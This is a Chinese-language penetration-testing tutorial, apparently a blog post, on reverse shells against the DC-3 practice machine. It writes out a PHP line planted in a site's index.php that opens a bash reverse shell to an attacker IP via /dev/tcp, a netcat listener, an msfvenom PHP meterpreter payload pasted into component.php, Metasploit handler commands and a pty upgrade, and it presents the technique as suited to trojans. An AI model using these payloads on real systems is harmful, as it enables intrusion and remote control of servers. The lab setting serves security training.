2022渗透测试-反弹shell的详细讲解

简介: 2022渗透测试-反弹shell的详细讲解

 目录

1.反弹shell简介

2.为什么要进行反弹shell

3.反弹shell的演示

1.bash反弹shell

2.msf反弹shell

1.反弹shell简介

反弹shell是一种反向链接,与正向的ssh等不同,它是在对方电脑执行命令连接到我方的攻击模式,并且这种攻击模式必须搭配远程执行命令漏洞来使用。

2.为什么要进行反弹shell

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器,这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。

那么什么情况下正向连接不太好用了呢:

1. 某客户机中了你的网马,但是它在局域网内,你直接连接不了。

2. 它的ip会动态改变,你不能持续控制。

3. 由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4. 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。

那么反弹就很好理解了, 攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹 shell。

3.反弹shell的演示

1.bash反弹shell

这里以dc-3靶场为例,具体的操作流程我在上一篇文章中发布过了,下面是链接。

网络异常,图片无法展示
|
我们在网站中到找了index.php文件,此时我们就可以通过反弹shell,使用nc监听反弹的端口。

image.gif编辑

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.120.129/1234 0>&1' ");?>

image.gif

bash -i >& /dev/tcp/攻击端ip/4100 0>&1
bash -i表示启动一个交互式的shell;
>& 这个交互式shell的标准输出和标准错误输出,重定向到这socket上/dev/tcp/攻击端ip/4100,也即发送到/dev/tcp/攻击端ip/4100远端;
0>&1 标准输入重定向到标准输出上;
简而言之,就是启动一个交互式shell,这个交互式shell的输入来自攻击端,输出也到攻击端。

image.gif编辑

本地监听1234端口

nc -lvvp  1234

image.gif

image.gif编辑

然后登陆下面这个网址,也就是index.php所在的位置。

http://192.168.143.136/templates/beez3/index.php

image.gif

此时,可以看到反弹shell成功。

image.gif编辑

2.msf反弹shell

MSF制作PHP木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.120.129 LPORT=4444

image.gif

image.gif编辑

直接将内容粘贴至component.php

image.gif编辑

MSF建立会话

#1.使用Handler模块
msf6 >use exploit/multi/handler
#2.设置payload
msf6> set payload php/meterpreter/reverse_tcp
#3.设置监听IP
msf6> set LHOST 192.168.120.129
#4.设置监听端口
msf6> set LPORT 4444
#开启监听
msf6> run

image.gif

开启监听后,当我们访问http://dc-3/templates/beez3/component.php,即可得到会话

系统提权

此时进入shell,发现看不到命令提示,使用python进入伪终端。

python -c 'import pty;pty.spawn("/bin/bash")'

image.gif

image.gif编辑


相关文章
|
2月前
|
监控 网络协议 Unix
Linux命令-nc(端口监控、文件传输、反弹shell等)
Linux命令-nc(端口监控、文件传输、反弹shell等)
39 0
|
4月前
|
Shell
反弹shell脚本(php-reverse-shell)
反弹shell脚本(php-reverse-shell)
72 0
|
4月前
|
安全 网络协议 Shell
[笔记]Windows安全之《一》反弹Shell
[笔记]Windows安全之《一》反弹Shell
|
9月前
|
安全 Shell Linux
使用OpenSsl加密反弹shell
当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量
168 0
|
9月前
|
网络协议 Shell 网络安全
利用icmpsh建立icmp隧道反弹shell
利用icmpsh建立icmp隧道反弹shell
74 0
|
9月前
|
Shell 数据库连接 数据库
宝塔后渗透-添加用户|反弹shell
宝塔后渗透-添加用户|反弹shell
228 0
|
网络协议 JavaScript Java
反弹shell备忘录
常用的一些反弹shell命令备忘录
283 0
|
网络协议 Java Shell
使用nc及bash进行反弹shell的简单实践
使用nc及bash进行反弹shell的简单实践
414 0
使用nc及bash进行反弹shell的简单实践
|
NoSQL 安全 网络协议
|
安全 NoSQL 关系型数据库
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell,直接看操作
417 0
网络安全——利用ssrf操作内网redis写入计划任务反弹shell

相关产品

  • 云迁移中心